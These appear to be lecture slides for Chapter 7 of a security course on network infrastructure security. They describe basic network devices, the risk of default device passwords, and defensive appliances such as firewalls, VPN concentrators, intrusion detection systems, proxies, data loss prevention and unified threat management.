Chapter 7

Network Infrastructure
Security
Learning Objectives
■ Understand the differences between basic network devices, such as
hubs, bridges, switches, and routers.
■ Identify common concerns related to basic network devices
■ Understand security devices employed in a network
■ Enhance security using security devices
Introduction
• Infrastructure security begins with the design of the infrastructure
itself.
• The proper use of components improves not only performance, but
security as well.
• Network components are not isolated from the computing
environment, and are an essential aspect of a total computing
environment.
• From the routers, switches, and cables that connect the devices, to
the firewalls and gateways that manage communication, from the
network design, to the protocols that are employed—all these items
play essential roles in both performance and security.
Networks
• Networks connect workstations and servers as well as serve as the
means of data communication between these elements.
• Workstation: is the machine that sits on the desktop and is used
every day for sending and reading e-mail, creating spreadsheets,
writing reports in a word processing program, and playing games.
• Servers: are the computers in a network that host applications and
data for everyone to share.
Basic Network Devices
• Networks are used to connect devices together.
• Networks are composed of components that perform networking
functions to move data between devices.
• Networks begin with network interface cards and then continue
in layers of switches and routers.
• Specialized networking devices are used for specific purposes,
such as security and traffic management:
• Network Interface Cards (NIC): is a card with a connector port for a
particular type of network connection, either Ethernet or Token Ring
used to connect a server or workstation to a network (Layer 1).
• Hubs: is networking equipment that connects devices that use the
same protocol (Layer 1).
• Bridges: are networking equipment that connect devices using the
same protocol (Layer 2).
• Switches: form the basis for connections in most Ethernet-based LANs
(Layer 2).
• Routers: is a network traffic management device used to connect
different network segments together (Layer 3).
Device Security, Common Concerns
• As more and more interactive devices (that is, devices you can interact with
programmatically) are being designed, a new threat source has appeared.
• In an attempt to build security into devices, typically, a default account and
password must be entered to enable the user to access and configure the
device remotely.
• These default accounts and passwords are well known in the hacker
community, so one of the first steps you must take to secure such devices is
to change the default credentials.
• Anyone who has purchased a home office router knows the default
configuration settings and can check to see if another user has changed
theirs. If they have not, this is a huge security hole, allowing outsiders to
“reconfigure” their network devices.
Security Devices
• A range of devices can be • Network Security Devices Include:
employed at the network layer 1. Firewalls
2. VPN Concentrator
to instantiate security 3. Wireless devices
functionality. 4. Modems
5. Telephony
• Devices can be used for intrusion 6. Intrusion Detection Systems
detection, network access 7. Network Access Control
control, and a wide range of 8. Networking Monitoring/Diagnostic
9. Load Balancers
other security functions. 10. Proxies
• Each device has a specific 11. Web Security Gateways
12. Internet Content Filters
network function and plays a 13. Data Loss Prevention
role in maintaining network 14. Unified Threat Management
infrastructure security.
Firewalls
• A firewall is a network device—
hardware, software, or a
combination thereof—whose
purpose is to enforce a security
policy across its connections by
allowing or denying traffic to
pass into or out of the network.
• The perfect firewall policy is one
that the end user never sees and
one that never allows even a
single unauthorized packet to
enter the network.
Firewalls (Cont.)
How Do Firewall Works? Firewalls enforce the established security policies. They can do this through a
variety of mechanisms:
• Network Address Translation (NAT): NAT translates private (nonroutable) IP addresses into public
(routable) IP addresses. It is one of the most basic security functions provided by a firewall.
• Basic packet filtering: looks at each packet entering or leaving the network and then either accepts
the packet or rejects the packet based on user-defined rules. Each packet is examined separately.
• Stateful packet filtering: also looks at each packet, but it can examine the packet in its relation to
other packets. Stateful firewalls keep track of network connections and can apply slightly different
rule sets based on whether or not the packet is part of an established session.
• Access control lists (ACLs): ACLs are simple rule sets applied to port numbers and IP addresses. They
can be configured for inbound and outbound traffic and are most commonly used on routers and
switches.
• Application layer proxies: can examine the content of the traffic as well as the ports and IP
addresses. For example, an application layer has the ability to look inside a user’s web traffic, detect
a malicious website attempting to download malware to the user’s system, and block the malware.
VPN Concentrator
• A virtual private network (VPN) is a construct used to provide a secure communication
channel between users across public networks such as the Internet.
• A VPN concentrator is a special endpoint inside a network designed to accept multiple
VPN connections and integrate these independent connections into the network in a
scalable fashion.
• The most common implementation of VPN is via IPSec, a protocol for IP security. IPSec is
mandated in IPv6 and is optional in IPv4.
• IPSec can be implemented in hardware, software, or a combination of both, and it’s used
to encrypt all IP traffic.
• The use of encryption technologies allows either:
• The data in a packet to be encrypted: If the data is encrypted, the packet header can still be
sniffed and observed between source and destination, but the encryption protects the contents of
the packet from inspection.
• Or, the entire packet to be encrypted: If the entire packet is encrypted, it is then placed into
another packet and sent via a tunnel across the public network. Tunneling can protect even the
identity of the communicating parties.
Wireless Devices
• Wireless devices bring additional security concerns. There is, by definition,
no physical connection to a wireless device; radio waves or infrared carries
the data, allowing anyone within range access to the data.
• This means that unless you take specific precautions, you have no control
over who can see your data.
• Placing a wireless device behind a firewall does not do any good, because
the firewall stops only physically connected traffic from reaching the
device. Outside traffic can come literally from the parking lot directly to the
wireless device and into the network.
• The point of entry from a wireless device to a wired network is performed
at a device called a wireless access point (WAP). Wireless access points can
support multiple concurrent devices accessing network resources through
the network node they create.
Modems
• Modems were once a slow method of remote connection that was used to connect
client workstations to remote services over standard telephone lines.
• Today, the use of the term has expanded to cover devices connected to special digital
telephone lines (DSL modems), cable television lines (cable modems), and fiber modems.
• Both cable and fiber services are designed for a continuous connection, which brings up
the question of IP address life for a client.
• Although some services originally used a static IP arrangement, virtually all have now
adopted the Dynamic Host Configuration Protocol (DHCP) to manage their address
space.
• The security issue with a static IP address is that it is a stationary target for hackers.
• The move to DHCP has not significantly lessened this threat, however, because the
typical IP lease on a cable modem DHCP server is for days.
• This is still relatively stationary, and some form of firewall protection needs to be
employed by the user.
Telephony
• A private branch exchange (PBX) is an extension of the public telephone network into a business.
• PBXs are frequently interconnected and have security requirements as part of this interconnection, as
well as security requirements of their own.
• PBXs are computer-based switching equipment designed to connect telephones into the local phone
system.
• They can be compromised from the outside and used by phone hackers (phreakers) to make phone
calls at the business’s expense.
• Another problem with PBXs arises when they are interconnected to the data systems, a path exists for
connection to outside data networks and the Internet. So, a firewall is needed.
• Telecommunications firewalls are a distinct type of firewall designed to protect both the PBX and the
data connections.
• The functionality of a telecommunications firewall is the same as that of a data firewall: it is there to
enforce security policies.
• Telecommunication security policies can be enforced even to cover hours of phone use, to prevent
unauthorized long-distance usage through the implementation of access codes and/or restricted
service hours.
Intrusion Detection Systems
• An intrusion detection system (IDS) is a security system that detects
inappropriate or malicious activity on a computer or network.
• IDSs are typically divided into two main categories:
• Host-based IDS (HIDS): Examines activity on an individual system, such as a mail
server, web server, or individual PC.
• Network-based IDS (NIDS): Examines activity on the network itself.
• IDS has the following logical components:
• Traffic collector (or sensor): Collects activity/events for the IDS to examine.
• Analysis engine: Examines the collected network traffic and compares it to known
patterns of suspicious or malicious activity stored in the signature database.
• Signature database: A collection of patterns and definitions of known suspicious or
malicious activity.
• User interface and reporting: Interfaces with the human element, providing alerts
when appropriate and giving the user a means to interact with and operate the IDS.
Network Access Control
• Network access control (NAC) refers to managing the endpoints on a
case-by-case basis as they connect.
• NAC is built around the idea that the network should be able to
enforce a specific level of endpoint security before it accepts a new
connection.
• The initial vendors were Microsoft and Cisco, but NAC now has a
myriad of vendors, with many different solutions providing different
levels of “health” checks before allowing a device to join a network.
Network Monitoring/Diagnostic
• Networks need management, monitoring, and fault resolution.
• SNMP was developed to perform this function across networks.
• SNMP, the Simple Network Management Protocol, is a part of the
Internet Protocol suite of protocols.
• SNMP is an open standard, designed for transmission of management
functions between devices.
Load Balancers
• Certain systems, such as servers, are more critical to business operations and
should therefore be the object of fault-tolerance measures.
• A common technique that is used in fault tolerance is load balancing – which
involves the use of devices that move loads across a set of resources in an effort
not to overload individual servers.
• This technique is designed to distribute the processing load over two or more
systems which can increase the fault tolerance of the overall system.
• It is used to help improve resource utilization and throughput
• When a load balancer moves loads across a set of resources, it decides which
machine gets a request via a scheduling algorithm. There commonly scheduling
algorithms:
• Affinity-based scheduling: designed to keep a host connected to the same server across a
session.
• Round-Robin scheduling: involves sending each new request to the next server in rotation.
Proxies
• Proxies serve to manage connections between
systems, acting as relays for the traffic.
• Proxy server (or simply proxy) can be used to
filter out undesirable traffic and prevent
employees from accessing potentially hostile
websites.
• A proxy server takes requests from a client
system and forwards them to the destination
server on behalf of the client.
• From a security perspective, proxies are most
useful in their ability to control and filter
outbound requests.
Proxies (Cont.)
Several major categories of proxy servers are in use:
• Anonymizing proxy: is designed to hide information about the requesting system and
make a user’s web browsing experience “anonymous.”
• Caching proxy: keeps local copies of popular client requests and is often used in large
organizations to reduce bandwidth usage and increase performance.
• Content-filtering proxies: examine each client request and compare it to an established
acceptable use policy (AUP).
• Open proxy: is essentially available to any Internet user and often has some anonymizing
capabilities as well.
• Reverse proxy: is typically installed on the server side of a network connection, often in
front of a group of web servers.
• Forward proxy: operates to forward requests to servers based on a variety of parameters.
• Web proxy: is solely designed to handle web traffic and is sometimes called a web cache.
 Web Security Gateways
• Some security vendors combine proxy functions with content-filtering functions to create
a product called a web security gateway.
• They are intended to address the security threats and pitfalls unique to web-based traffic.
• Web security gateways typically provide the following capabilities:
• Real-time malware protection (a.k.a. malware inspection): The ability to scan all
outgoing and incoming web traffic to detect and block undesirable traffic such as
malware, spyware, adware, malicious scripts, file-based attacks, and so on.
• Content monitoring: The ability to monitor the content of web traffic being examined
to ensure that it complies with organizational policies
• Productivity monitoring: The ability to measure the types and quantities of web
traffic being generated by specific users, groups of users, or the entire organization
• Data protection and compliance: Scanning web traffic for sensitive or proprietary
information being sent outside of the organization as well as the use of social network
sites or inappropriate sites.
Internet Content Filters
• The term Internet content filter, or just content filter, is applied to any device,
application, or software package that examines network traffic (especially web
traffic) for undesirable or restricted content.
• In addition to filtering undesirable content, such as pornography, some content
filters can also filter out malicious activity such as browser hijacking attempts or
cross-site scripting (XSS) attacks.
• A content filter could be a software package loaded on a specific PC or a network
appliance capable of filtering an entire organization’s web traffic.
• Content-filtering systems face many challenges, because the everchanging
Internet makes it difficult to maintain lists of undesirable sites (sometimes called
block lists/deny lists or black lists).
• To help administrators, most commercial content-filtering solutions provide an
update service, much like IDS or antivirus products, that updates keywords and
undesirable sites automatically
Data Loss Prevention
• Data loss prevention (DLP): refers to technology employed to detect and
prevent transfers of data across an enterprise.
• Employed at key locations, DLP technology can scan packets for specific
data patterns.
• This technology can be tuned to detect account numbers, secrets, specific
markers, or files.
• When specific data elements are detected, the system can block the
transfer.
• The primary challenge in employing DLP technologies is the placement of
the sensor.
• The DLP sensor needs to be able to observe the data, so if the channel is
encrypted, DLP technology can be thwarted.
Unified Threat Management
• Many security vendors offer “all-in-one
security appliances,” which are devices
that combine multiple functions into
the same hardware appliance.
• A common name for these all-in-one
appliances is unified threat
management (UTM) appliance.
• A UTM solution can have better
integration and efficiencies in handling
network traffic and incidents than a
collection of tools connected together.
Chapter 7 Summary
After reading this chapter, you should be able to:
• Understand the differences between basic network devices, such as
hubs, bridges, switches, and routers.
• Identify common concerns related to basic network devices
• Understand security devices employed in a network
• Enhance security using security devices
End of Chapter 7